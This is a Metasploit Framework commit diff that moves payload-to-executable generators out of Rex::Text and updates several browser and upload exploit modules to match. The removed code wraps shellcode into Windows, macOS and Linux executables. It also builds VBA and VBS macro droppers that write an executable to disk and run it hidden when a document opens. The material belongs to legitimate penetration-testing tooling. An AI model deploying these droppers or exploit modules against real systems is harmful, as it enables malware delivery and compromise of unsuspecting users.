removed executable generation routines from Rex::Text (use Msf::Util::EXE), Fixes #660

git-svn-id: file:///home/svn/framework3/trunk@7760 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-08 21:24:45 +00:00 · 2009-12-08 21:24:45 +00:00 · 87c85b5176
parent 9b4f521df5
commit 87c85b5176
8 changed files with 8 additions and 304 deletions
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@ -563,302 +563,7 @@ module Text
 		Digest::MD5.hexdigest(str)
 	end
 	##
 	#
 	# Executable generators
 	#
 	##
 	# XXX: depends on the Msf code being loaded, not just Rex
 	def self.to_executable(arch, plat, code, note='')
 		if (arch.index(ARCH_X86))
 			if (plat.index(Msf::Module::Platform::Windows))
 				return Rex::Text.to_win32pe(code, note)
 			end
 			if (plat.index(Msf::Module::Platform::Linux))
 				return Rex::Text.to_linux_x86_elf(code, note)
 			end
 			if(plat.index(Msf::Module::Platform::OSX))
 				return Rex::Text.to_osx_x86_macho(code, note)		
 			end	
 			# XXX: Add remaining x86 systems here					
 		end
 		if( arch.index(ARCH_X86_64) or arch.index( ARCH_X64 ) )
 			if (plat.index(Msf::Module::Platform::Windows))
 				return Rex::Text.to_win64pe(code, note)
 			end
 		end
 		if(arch.index(ARCH_ARMLE))
 			if(plat.index(Msf::Module::Platform::OSX))
 				return Rex::Text.to_osx_arm_macho(code, note)		
 			end
 			# XXX: Add Linux here
 		end
 		if(arch.index(ARCH_PPC))
 			if(plat.index(Msf::Module::Platform::OSX))
 				return Rex::Text.to_osx_ppc_macho(code, note)	
 			end
 			# XXX: Add PPC OS X and Linux here			
 		end						
 		nil
 	end
 	def self.to_win32pe(code = "\xcc", note="")
 		pe = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template.exe"), "rb")
 		pe = fd.read(fd.stat.size)
 		fd.close
 		bo = pe.index('PAYLOAD:')
 		pe[bo,  2048] = [code].pack('a2048') if bo
 		pe[136,    4] = [rand(0x100000000)].pack('V')
 		ci = pe.index("\x31\xc9" * 160)
 		cd = pe.index("\x31\xc9" * 160, ci + 320)
 		rc = pe[ci+320, cd-ci-320]
 		# 640 + rc.length bytes of room to store an encoded rc at offset ci
 		return pe
 	end
 	def self.to_win64pe(code = "\xcc", note="")
 		pe = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x64_windows.exe"), "rb")
 		pe = fd.read(fd.stat.size)
 		fd.close
 		bo = pe.index('PAYLOAD:')
 		pe[bo,  2048] = [code].pack('a2048') if bo
 		return pe
 	end
 	def self.to_win32pe_service(code = "\xcc", name="SERVICENAME")
 		pe = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "service.exe"), "rb")
 		pe = fd.read(fd.stat.size)
 		fd.close
 		bo = pe.index('PAYLOAD:')
 		pe[bo, 2048] = [code].pack('a2048') if bo
 		bo = pe.index('SERVICENAME')
 		pe[bo, 11] = [name].pack('a11') if bo
 		pe[136, 4] = [rand(0x100000000)].pack('V')
 		return pe
 	end
 	def self.to_osx_arm_macho(code = "", note="")
 		mo = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_armle_darwin.bin"), "rb")
 		mo = fd.read(fd.stat.size)
 		fd.close
 		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
 		co = mo.index( " " * 512 )
 		mo[bo, 2048] = [code].pack('a2048') if bo
 		mo[co, 512]  = [note].pack('a512') if co
 		return mo
 	end
 	def self.to_osx_ppc_macho(code = "", note="")
 		mo = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_ppc_darwin.bin"), "rb")
 		mo = fd.read(fd.stat.size)
 		fd.close
 		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
 		co = mo.index( " " * 512 )
 		mo[bo, 2048] = [code].pack('a2048') if bo
 		mo[co, 512]  = [note].pack('a512') if co
 		return mo
 	end
 	def self.to_osx_x86_macho(code = "", note="")
 		mo = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x86_darwin.bin"), "rb")
 		mo = fd.read(fd.stat.size)
 		fd.close
 		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
 		co = mo.index( " " * 512 )
 		mo[bo, 2048] = [code].pack('a2048') if bo
 		mo[co, 512]  = [note].pack('a512') if co
 		return mo
 	end
 	def self.to_linux_x86_elf(code = "", note="")
 		mo = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x86_linux.bin"), "rb")
 		mo = fd.read(fd.stat.size)
 		fd.close
 		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
 		co = mo.index( " " * 512 )
 		mo[bo, 2048] = [code].pack('a2048') if bo
 		mo[co, 512]  = [note].pack('a512') if co
 		return mo
 	end
 	def self.to_exe_vba(exe='')
 		vba = ""
 		pcs = (exe.length/2000)+1
 		idx = 0
 		var_base_idx = 0
 		var_base     = rand_text_alpha(2).capitalize
 		var_bytes = var_base + (var_base_idx+=1).to_s
 		var_initx = var_base + rand_text_alpha(1) + (var_base_idx+=1).to_s
 		vba << "Dim #{var_bytes}(#{exe.length}) as Byte\r\n\r\n"
 		1.upto(pcs) do |pc|
 			max = 0
 			vba << "Sub #{var_initx}#{pc}()\r\n"
 			while(c = exe[idx] and max < 2000)
 				vba << "\t#{var_bytes}(#{idx}) = &H#{("%.2x" % c).upcase}\r\n"
 				idx += 1
 				max += 1
 			end	
 			vba << "End Sub\r\n"
 		end
 		var_lname = var_base + (var_base_idx+=1).to_s
 		var_lpath = var_base + (var_base_idx+=1).to_s
 		var_appnr = var_base + (var_base_idx+=1).to_s
 		var_datnr = var_base + (var_base_idx+=1).to_s
 		vba << "Sub Auto_Open()\r\n"
 		vba << "\tDim #{var_appnr} As Integer\r\n"
 		vba << "\tDim #{var_datnr} As Integer\r\n"
 		vba << "\tDim #{var_lname} As String\r\n"
 		vba << "\tDim #{var_lpath} As String\r\n"
 		vba << "\t#{var_lname} = \"#{rand_text_alpha(rand(8)+8)}.exe\"\r\n"
 		vba << "\t#{var_lpath} = Environ(\"USERPROFILE\")\r\n"
 		vba << "\tChDrive (#{var_lpath})\r\n"
 		vba << "\tChDir (#{var_lpath})\r\n"
 		vba << "\t#{var_datnr} = FreeFile()\r\n"
 		vba << "\tOpen #{var_lname}  For Binary Access Read Write As #{var_datnr}\r\n"
 		1.upto(pcs) do |pc|
 			vba << "\t#{var_initx}#{pc}\r\n"
 		end
 		vba << "\tPut #{var_datnr}, , #{var_bytes}\r\n"
 		vba << "\tClose #{var_datnr}\r\n"
 		vba << "\t#{var_appnr} = Shell(#{var_lname}, vbHide)\r\n"
 		vba << "End Sub\r\n"
 		vba << "Sub AutoOpen()\r\n"
 		vba << "\tAuto_Open\r\n"
 		vba << "End Sub\r\n"
 		vba << "Sub Workbook_Open()\r\n"
 		vba << "\tAuto_Open\r\n"
 		vba << "End Sub\r\n"
 	end
 	def self.to_win32pe_vba(code = "\xcc", note="")
 		to_exe_vba(to_win32pe(code, note))
 	end
 	def self.to_exe_vbs(exes = '')
 		exe = exes.unpack("C*")
 		vbs = ""
 		var_bytes = rand_text_alpha(rand(8)+8)
 		var_fname = rand_text_alpha(rand(8)+8)
 		var_func = rand_text_alpha(rand(8)+8)
 		var_stream = rand_text_alpha(rand(8)+8)
 		var_obj = rand_text_alpha(rand(8)+8)
 		var_shell = rand_text_alpha(rand(8)+8)
 		vbs << "Function #{var_func}()\r\n"
 		vbs << "#{var_bytes} = Chr(&H#{("%02x" % exe[0])})"
 		1.upto(exe.length) do |byte|
 			vbs << "&Chr(&H#{("%02x" % exe[byte])})" 
 		end	
 		vbs << "\r\n"
 		vbs << "Dim #{var_obj}\r\n"
 		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
 		vbs << "Dim #{var_stream}\r\n"
 		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(\"#{var_fname}.exe\")\r\n"
 		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
 		vbs << "#{var_stream}.Close\r\n"
 		vbs << "Dim #{var_shell}\r\n"
 		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
 		vbs << "#{var_shell}.run(\"#{var_fname}.exe\")\r\n"
 		vbs << "End Function\r\n"
 		vbs << "#{var_func}\r\n"
 	end
 	def self.to_win32pe_vbs(code = "\xcc", note="")
 		to_exe_vbs(to_win32pe(code, note))
 	end
 	# Creates a .NET DLL which loads data into memory
 	# at a specified location with read/execute permissions
 	#    - the data will be loaded at: base+0x2065
 	#    - max size is 0x8000 (32768)
 	def self.to_dotnetmem(base=0x12340000, data="")
 		pe = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "dotnetmem.dll"), "rb")
 		pe = fd.read(fd.stat.size)
 		fd.close
 		# Configure the image base
 		pe[180, 4] = [base].pack('V')
 		# Configure the TimeDateStamp
 		pe[136, 4] = [rand(0x100000000)].pack('V')
 		# XXX: Unfortunately we cant make this RWX only RX
 		# Mark this segment as read-execute AND writable
 		# pe[412,4] = [0xe0000020].pack("V")
 		# Write the data into the .text segment
 		pe[0x1065, 0x8000] = [data].pack("a32768")
 		# Generic a randomized UUID
 		pe[37656,16] = Rex::Text.rand_text(16)
 		return pe
 	end
 	##
 	#
 	# Generators
--- a/modules/exploits/osx/email/mailapp_image_exec.rb
+++ b/modules/exploits/osx/email/mailapp_image_exec.rb
@ -151,11 +151,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			bin = ''
 			if(target.arch.index(ARCH_PPC))
-				bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
+				bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
 			end
 			if(target.arch.index(ARCH_X86))
-				bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
+				bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
 			end	
 			cmd = Rex::Text.encode_base64(bin, "\r\n")
--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '') 
+			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
--- a/modules/exploits/windows/browser/greendam_url.rb
+++ b/modules/exploits/windows/browser/greendam_url.rb
@ -17,7 +17,7 @@
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
+	Rank = NormalRanking
 	include Msf::Exploit::Remote::HttpServer::HTML
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vtable << p.encoded
 			send_response(
 				cli, 
-				Rex::Text.to_dotnetmem(ibase, vtable), 
+				Msf::Util::EXE.to_dotnetmem(ibase, vtable),
 				{
 					'Content-Type' => 'application/x-msdownload',
 					'Connection'   => 'close',
--- a/modules/exploits/windows/browser/ie_xml_corruption.rb
+++ b/modules/exploits/windows/browser/ie_xml_corruption.rb
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vtable << p.encoded
 			send_response(
 				cli,
-				Rex::Text.to_dotnetmem(ibase, vtable),
+				Msf::Util::EXE.to_dotnetmem(ibase, vtable),
 				{
 					'Content-Type' => 'application/x-msdownload',
 					'Connection'   => 'close',
--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@ -123,7 +123,6 @@ function #{func}()
 		print_status("Sending payload exe to #{cli.peerhost}:#{cli.peerport}...")
 		return if ((p = regenerate_payload(cli)) == nil)
 		#data = Rex::Text.to_win32pe(p.encoded, '')
 		data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
 		# send the exe
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '') 
+			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
--- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb
+++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 		exe  = rand_text_alpha(8) + ".exe"
-		data = Rex::Text.to_win32pe(payload.encoded, '')
+		data = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
                pkt1 =  "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
                pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"